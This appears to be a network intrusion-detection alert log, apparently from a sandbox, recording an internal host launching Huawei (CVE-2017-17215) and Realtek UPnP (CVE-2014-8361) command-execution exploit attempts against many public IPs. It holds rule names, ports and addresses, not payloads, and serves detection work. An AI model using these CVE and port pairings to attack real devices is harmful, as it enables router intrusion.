                                                07/20/24-23:05:47.106820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4939437215192.168.2.14197.79.14.187
                                                07/20/24-23:06:06.640556TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615519852869192.168.2.14192.90.118.17
                                                07/20/24-23:06:38.912153TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25592452869192.168.2.14167.193.31.8
                                                07/20/24-23:05:38.229203TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615214452869192.168.2.14131.183.255.118
                                                07/20/24-23:05:56.086216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4617037215192.168.2.14197.124.245.140
                                                07/20/24-23:05:59.262795TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3348452869192.168.2.1412.78.58.71
                                                07/20/24-23:05:33.861088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4189237215192.168.2.14125.218.223.230
                                                07/20/24-23:05:57.114018TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23642652869192.168.2.14209.32.151.5
                                                07/20/24-23:06:02.691312TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4406252869192.168.2.14222.129.187.194
                                                07/20/24-23:05:36.338927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5221437215192.168.2.14157.76.194.96
                                                07/20/24-23:05:37.454499TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24886052869192.168.2.14153.104.11.80
                                                07/20/24-23:06:27.965613TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5062852869192.168.2.14150.246.129.82
                                                07/20/24-23:05:57.422953TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4396652869192.168.2.14130.194.61.21
                                                07/20/24-23:06:18.671322TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5043052869192.168.2.1439.61.107.238
                                                07/20/24-23:06:16.287042TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614721852869192.168.2.1493.129.164.15
                                                07/20/24-23:05:37.468948TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23573252869192.168.2.1417.92.216.196
                                                07/20/24-23:05:40.071724TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615718852869192.168.2.1461.189.27.68
                                                07/20/24-23:06:48.772924TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25777852869192.168.2.14130.122.247.240
                                                07/20/24-23:05:39.223857TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4406252869192.168.2.1484.235.146.124
                                                07/20/24-23:06:14.487901TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615816052869192.168.2.14216.57.237.73
                                                07/20/24-23:05:45.125189TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5715452869192.168.2.1419.168.69.174
                                                07/20/24-23:05:47.286733TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4751852869192.168.2.14223.116.88.128
                                                07/20/24-23:06:00.540716TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4837452869192.168.2.14171.203.207.215
                                                07/20/24-23:05:59.787018TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25079252869192.168.2.1481.224.30.46
                                                07/20/24-23:06:15.338809TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613285852869192.168.2.14209.246.221.148
                                                07/20/24-23:05:44.357595TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3715652869192.168.2.1475.112.155.168
                                                07/20/24-23:05:55.889998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4499037215192.168.2.14212.191.102.237
                                                07/20/24-23:05:47.105578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3408637215192.168.2.14197.1.44.29
                                                07/20/24-23:06:06.076249TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615955652869192.168.2.1438.86.172.217
                                                07/20/24-23:05:59.454601TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23519452869192.168.2.14221.158.4.113
                                                07/20/24-23:05:58.217467TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4940852869192.168.2.14218.24.116.194
                                                07/20/24-23:06:27.237128TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5608652869192.168.2.1484.66.83.143
                                                07/20/24-23:05:56.993065TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615580852869192.168.2.1438.177.215.154
                                                07/20/24-23:05:33.833027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4230637215192.168.2.14166.16.190.83
                                                07/20/24-23:05:50.533759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3750237215192.168.2.14189.78.163.147
                                                07/20/24-23:05:37.442841TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3741252869192.168.2.14200.98.155.108
                                                07/20/24-23:05:58.849532TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23669452869192.168.2.1413.149.201.70
                                                07/20/24-23:06:01.479448TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4741652869192.168.2.14208.32.105.243
                                                07/20/24-23:05:35.206536TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5706652869192.168.2.14133.8.172.164
                                                07/20/24-23:05:59.333908TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5311452869192.168.2.14199.125.41.58
                                                07/20/24-23:05:37.440705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4832252869192.168.2.1457.131.227.3
                                                07/20/24-23:05:39.357380TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4252252869192.168.2.1490.16.174.124
                                                07/20/24-23:06:00.209942TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25458252869192.168.2.14103.198.111.177
                                                07/20/24-23:05:42.188277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3919437215192.168.2.1441.94.86.182
                                                07/20/24-23:06:13.319028TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23608852869192.168.2.14178.92.19.218
                                                07/20/24-23:06:29.180793TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613300452869192.168.2.14139.16.8.188
                                                07/20/24-23:05:35.267339TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3403252869192.168.2.1441.109.181.54
                                                07/20/24-23:06:51.240850TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5687452869192.168.2.1467.39.83.201
                                                07/20/24-23:05:40.355569TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24043052869192.168.2.1498.62.200.115
                                                07/20/24-23:05:52.526128TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24032852869192.168.2.1432.113.241.254
                                                07/20/24-23:05:58.253105TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613783052869192.168.2.1476.195.229.149
                                                07/20/24-23:05:48.762153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4413637215192.168.2.1441.209.81.98
                                                07/20/24-23:06:18.484078TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3602252869192.168.2.148.221.108.93
                                                07/20/24-23:05:37.472951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4476052869192.168.2.14142.219.250.29
                                                07/20/24-23:06:09.934740TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615220852869192.168.2.144.160.29.45
                                                07/20/24-23:05:33.863090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3848037215192.168.2.14197.148.145.109
                                                07/20/24-23:05:57.816478TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615433052869192.168.2.14108.132.143.152
                                                07/20/24-23:07:31.562284TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614229652869192.168.2.14189.112.68.113
                                                07/20/24-23:05:36.338927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5438637215192.168.2.1441.253.179.250
                                                07/20/24-23:05:38.953817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4134037215192.168.2.14173.8.173.13
                                                07/20/24-23:05:39.165987TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613968652869192.168.2.1418.146.210.210
                                                07/20/24-23:05:48.066624TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614474652869192.168.2.14105.215.161.3
                                                07/20/24-23:05:38.426944TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615913252869192.168.2.14154.203.201.18
                                                07/20/24-23:05:57.591570TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613452652869192.168.2.1413.165.183.213
                                                07/20/24-23:05:38.911338TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5283452869192.168.2.14154.76.182.106
                                                07/20/24-23:06:35.526204TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615610252869192.168.2.14211.231.173.53
                                                07/20/24-23:05:33.833027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3396037215192.168.2.1441.165.208.89
                                                07/20/24-23:06:01.650758TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25101852869192.168.2.1496.167.251.238
                                                07/20/24-23:05:58.154497TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5059452869192.168.2.14186.26.42.76
                                                07/20/24-23:05:57.571972TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5435052869192.168.2.14161.171.80.80
                                                07/20/24-23:06:07.419849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4038637215192.168.2.14130.96.49.178
                                                07/20/24-23:05:55.877930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5899837215192.168.2.1418.59.179.247
                                                07/20/24-23:05:37.443569TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23428052869192.168.2.1459.35.79.156
                                                07/20/24-23:05:50.522256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435037215192.168.2.14197.108.94.31
                                                07/20/24-23:05:37.496382TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23459452869192.168.2.141.211.28.20
                                                07/20/24-23:05:35.918953TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4936852869192.168.2.14199.117.44.204
                                                07/20/24-23:05:48.858199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3510037215192.168.2.1441.151.51.214
                                                07/20/24-23:06:01.399812TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25093852869192.168.2.14221.147.86.128
                                                07/20/24-23:06:03.476247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5851437215192.168.2.14149.206.215.202
                                                07/20/24-23:06:07.980733TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3783052869192.168.2.14101.195.118.86
                                                07/20/24-23:06:01.154110TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5926252869192.168.2.14162.255.243.82
                                                07/20/24-23:05:45.068811TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614414052869192.168.2.1445.94.223.106
                                                07/20/24-23:05:59.005036TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5830052869192.168.2.14181.109.235.229
                                                07/20/24-23:05:57.161619TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25032852869192.168.2.1485.19.89.54
                                                07/20/24-23:05:39.067591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578037215192.168.2.14157.234.60.234
                                                07/20/24-23:07:06.736138TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3912652869192.168.2.14139.145.62.207
                                                07/20/24-23:05:58.709518TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4914252869192.168.2.1412.142.133.82
                                                07/20/24-23:06:56.793781TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4676252869192.168.2.14134.166.44.252
                                                07/20/24-23:05:50.531553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5078037215192.168.2.14157.206.135.181
                                                07/20/24-23:05:56.038244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4270437215192.168.2.1414.57.157.85
                                                07/20/24-23:05:57.584377TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5045452869192.168.2.1443.137.138.121
                                                07/20/24-23:05:59.262014TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24525452869192.168.2.1484.85.135.93
                                                07/20/24-23:06:13.365995TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614959652869192.168.2.14101.36.193.215
                                                07/20/24-23:05:40.451363TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24514052869192.168.2.1427.50.141.50
                                                07/20/24-23:06:04.880694TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614057652869192.168.2.14149.218.131.156
                                                07/20/24-23:06:56.433850TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615877252869192.168.2.1423.100.51.122
                                                07/20/24-23:06:21.839686TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4613652869192.168.2.14142.60.102.52
                                                07/20/24-23:05:46.389614TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615018252869192.168.2.1452.57.110.73
                                                07/20/24-23:06:01.468942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4906252869192.168.2.14190.39.69.46
                                                07/20/24-23:05:48.763323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3390837215192.168.2.1441.82.160.190
                                                07/20/24-23:05:52.445659TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23299652869192.168.2.148.108.202.123
                                                07/20/24-23:05:39.067591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6043837215192.168.2.14197.163.50.43
                                                07/20/24-23:05:42.135703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5343437215192.168.2.1441.44.12.17
                                                07/20/24-23:05:58.090071TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23655452869192.168.2.14204.111.195.125
                                                07/20/24-23:06:10.357307TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24071252869192.168.2.14162.172.126.29
                                                07/20/24-23:05:33.863090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924637215192.168.2.14158.245.1.223
                                                07/20/24-23:05:42.135703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4006637215192.168.2.14197.193.129.207
                                                07/20/24-23:05:45.429987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5614837215192.168.2.14120.107.134.124
                                                07/20/24-23:05:47.085193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6007237215192.168.2.144.210.141.89
                                                07/20/24-23:05:52.716020TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24018452869192.168.2.1452.41.95.126
                                                07/20/24-23:05:45.633200TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615812052869192.168.2.1457.134.107.229
                                                07/20/24-23:05:52.499861TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5404652869192.168.2.14223.70.59.173
                                                07/20/24-23:06:17.555463TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615777652869192.168.2.1470.60.168.25
                                                07/20/24-23:05:45.437584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4052637215192.168.2.14177.224.66.232
                                                07/20/24-23:05:50.554912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5083837215192.168.2.14197.194.65.54
                                                07/20/24-23:06:53.637724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4319852869192.168.2.14142.157.239.245
                                                07/20/24-23:05:59.714236TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614343252869192.168.2.1481.47.157.203
                                                07/20/24-23:06:17.662629TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3712452869192.168.2.1496.167.164.193
                                                07/20/24-23:06:01.660757TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614812252869192.168.2.14191.99.26.134
                                                07/20/24-23:06:02.422168TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23726852869192.168.2.1466.165.40.13
                                                07/20/24-23:06:03.387430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3323837215192.168.2.1441.128.172.37
                                                07/20/24-23:05:57.781031TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5985252869192.168.2.1464.219.147.54
                                                07/20/24-23:06:05.139331TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5081452869192.168.2.14202.206.24.183
                                                07/20/24-23:06:02.911827TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615520852869192.168.2.14109.86.100.159
                                                07/20/24-23:05:40.462908TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24858252869192.168.2.1469.91.98.213
                                                07/20/24-23:06:05.678943TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615967252869192.168.2.1448.199.160.201
                                                07/20/24-23:05:33.859779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3585637215192.168.2.14197.219.134.66
                                                07/20/24-23:05:34.659618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4475437215192.168.2.14167.133.59.154
                                                07/20/24-23:05:37.440253TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25190852869192.168.2.1451.156.205.139
                                                07/20/24-23:05:36.324397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4188237215192.168.2.14157.63.205.35
                                                07/20/24-23:05:57.939156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5526252869192.168.2.14160.172.64.185
                                                07/20/24-23:05:33.830838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5997237215192.168.2.14155.221.192.136
                                                07/20/24-23:05:46.157384TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615087652869192.168.2.14198.39.44.17
                                                07/20/24-23:06:01.949518TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613956452869192.168.2.14118.95.252.63
                                                07/20/24-23:05:39.557710TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615634252869192.168.2.14166.95.201.236
                                                07/20/24-23:06:02.346541TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614558652869192.168.2.1440.244.169.7
                                                07/20/24-23:05:50.522256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440037215192.168.2.14157.252.114.118
                                                07/20/24-23:06:03.282313TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614320652869192.168.2.14184.168.0.191
                                                07/20/24-23:06:42.331305TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4918852869192.168.2.14152.112.48.167
                                                07/20/24-23:05:39.756595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348237215192.168.2.14197.77.80.96
                                                07/20/24-23:05:42.271822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3329037215192.168.2.14157.239.54.103
                                                07/20/24-23:06:29.180793TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24675052869192.168.2.14125.193.155.236
                                                07/20/24-23:05:34.626588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4370437215192.168.2.14197.213.57.205
                                                07/20/24-23:05:47.103906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3285837215192.168.2.1441.24.36.133
                                                07/20/24-23:05:36.329793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3634237215192.168.2.14213.181.91.168
                                                07/20/24-23:05:47.398358TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613687852869192.168.2.14207.223.84.204
                                                07/20/24-23:05:59.429308TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3699852869192.168.2.1467.148.203.96
                                                07/20/24-23:06:00.134392TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4967052869192.168.2.14109.36.201.204
                                                07/20/24-23:05:37.497165TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4993652869192.168.2.1414.90.249.72
                                                07/20/24-23:05:59.436745TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4122652869192.168.2.14151.48.203.94
                                                07/20/24-23:05:37.560327TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4011652869192.168.2.1420.40.190.208
                                                07/20/24-23:06:12.531607TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6061052869192.168.2.1459.102.173.92
                                                07/20/24-23:06:09.206449TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23912852869192.168.2.14119.34.14.186
                                                07/20/24-23:05:56.036527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4340837215192.168.2.1441.95.249.108
                                                07/20/24-23:05:38.166047TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3621852869192.168.2.14136.196.140.175
                                                07/20/24-23:05:38.312688TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615674252869192.168.2.1497.189.105.6
                                                07/20/24-23:05:40.440618TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5451452869192.168.2.14154.217.235.162
                                                07/20/24-23:05:37.468948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5929852869192.168.2.1444.6.194.12
                                                07/20/24-23:05:34.656192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4791837215192.168.2.1499.80.150.223
                                                07/20/24-23:05:40.416273TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23965452869192.168.2.1451.81.161.20
                                                07/20/24-23:05:50.501247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5916637215192.168.2.1457.211.225.146
                                                07/20/24-23:05:52.525575TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5581652869192.168.2.1454.172.8.61
                                                07/20/24-23:05:45.424851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5296237215192.168.2.14192.85.183.79
                                                07/20/24-23:05:48.432602TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614402252869192.168.2.1466.147.118.218
                                                07/20/24-23:05:59.270058TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614066852869192.168.2.1413.146.163.137
                                                07/20/24-23:05:33.827023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4234037215192.168.2.14197.112.26.200
                                                07/20/24-23:05:36.248451TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5781252869192.168.2.1444.6.194.12
                                                07/20/24-23:06:01.978394TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4089252869192.168.2.1496.35.224.207
                                                07/20/24-23:06:29.100644TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24825052869192.168.2.1443.11.143.126
                                                07/20/24-23:06:01.105390TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5860652869192.168.2.14204.151.52.231
                                                07/20/24-23:06:43.717699TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614957852869192.168.2.14102.225.7.156
                                                07/20/24-23:06:32.540943TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615613052869192.168.2.1420.238.42.49
                                                07/20/24-23:06:00.153687TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615740252869192.168.2.1490.210.129.8
                                                07/20/24-23:06:21.926399TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615585052869192.168.2.14113.70.115.254
                                                07/20/24-23:05:57.179441TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24311052869192.168.2.14119.6.68.125
                                                07/20/24-23:06:14.442724TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615763452869192.168.2.14178.170.81.229
                                                07/20/24-23:05:57.188540TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613303452869192.168.2.14126.2.43.140
                                                07/20/24-23:05:48.748553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4840637215192.168.2.14157.112.39.212
